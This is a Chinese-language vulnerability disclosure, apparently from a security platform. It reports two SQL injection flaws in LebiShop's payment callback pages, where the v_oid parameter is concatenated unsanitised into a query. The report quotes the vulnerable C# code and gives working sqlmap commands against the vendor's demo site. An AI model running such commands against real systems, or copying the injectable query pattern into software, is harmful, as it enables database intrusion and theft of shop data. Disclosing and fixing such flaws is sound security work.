LebiShop系统sql注入完结（两处注入）

### 简要描述： LebiShop商城系统最新版SQL注入 demo站点测试成功 最后两处 ### 详细说明： 注入一 \onlinepay\wangyinzaixian\AutoReceive.aspx 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { this.v_oid = base.Request["v_oid"]; //没处理 Lebi_OnlinePay onlinePay = Money.GetOnlinePay(this.v_oid); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); } else { string userKey = onlinePay.UserKey; this.v_oid = base.Request["v_oid"]; this.v_pstatus = base.Request["v_pstatus"]; this.v_pstring = base.Request["v_pstring"]; this.v_pmode = base.Request["v_pmode"]; this.v_md5str = base.Request["v_md5str"]; this.v_amount = base.Request["v_amount"]; this.v_moneytype = base.Request["v_moneytype"]; this.remark1 = base.Request["remark1"]; this.remark2 = base.Request["remark2"]; if (FormsAuthentication.HashPasswordForStoringInConfigFile(this.v_oid + this.v_pstatus + this.v_amount + this.v_moneytype + userKey, "md5").ToUpper() == this.v_md5str) { base.Response.Write("ok"); if (this.v_pstatus.Equals("20")) { Order.OnlinePaySuccess(this.v_oid, "", false); } } else { base.Response.Write("error"); } } } ``` ``` public static Lebi_OnlinePay GetOnlinePay(string code) { return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //存在注入 } ``` 注入二 地址 \onlinepay\wangyinzaixian\Receive.aspx 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { this.v_oid = base.Request["v_oid"]; //没处理 Lebi_OnlinePay onlinePay = Money.GetOnlinePay(this.v_oid); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); } else { string userKey = onlinePay.UserKey; this.v_pstatus = base.Request["v_pstatus"]; this.v_pstring = base.Request["v_pstring"]; this.v_pmode = base.Request["v_pmode"]; this.v_md5str = base.Request["v_md5str"]; this.v_amount = base.Request["v_amount"]; this.v_moneytype = base.Request["v_moneytype"]; this.remark1 = base.Request["remark1"]; this.remark2 = base.Request["remark2"]; if (FormsAuthentication.HashPasswordForStoringInConfigFile(this.v_oid + this.v_pstatus + this.v_amount + this.v_moneytype + userKey, "md5").ToUpper() == this.v_md5str) { if (this.v_pstatus.Equals("20")) { Order.OnlinePaySuccess(this.v_oid, "", true); } } else { base.Response.Write("校验失败,数据可疑"); } } } ``` ``` public static Lebi_OnlinePay GetOnlinePay(string code) { return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); } ``` ### 漏洞证明： 注入一 地址 http://demo.lebi.cn/onlinepay/wangyinzaixian/AutoReceive.aspx sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/wangyinzaixian/AutoReceive.aspx" --data "v_oid=1" --dbms "mssql" --technique=T --current-db ``` [<img src="https://images.seebug.org/upload/201503/06141227ba7aa4131daa84410011de0838231ca8.png" alt="526.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/06141227ba7aa4131daa84410011de0838231ca8.png) [<img src="https://images.seebug.org/upload/201503/06141329898dc8a5276564a6d64cc19c49bd37d5.png" alt="527.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/06141329898dc8a5276564a6d64cc19c49bd37d5.png) 注入二 http://demo.lebi.cn/onlinepay/wangyinzaixian/Receive.aspx sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/wangyinzaixian/Receive.aspx" --data "v_oid=1" --dbms "mssql" --technique=T --current-db ``` [<img src="https://images.seebug.org/upload/201503/06141433de4b1f713db16023ff655b757bf75a07.png" alt="528.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/06141433de4b1f713db16023ff655b757bf75a07.png) [<img src="https://images.seebug.org/upload/201503/061416261b76f3639a4cb7b5855a20d571d98e1a.png" alt="529.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/061416261b76f3639a4cb7b5855a20d571d98e1a.png)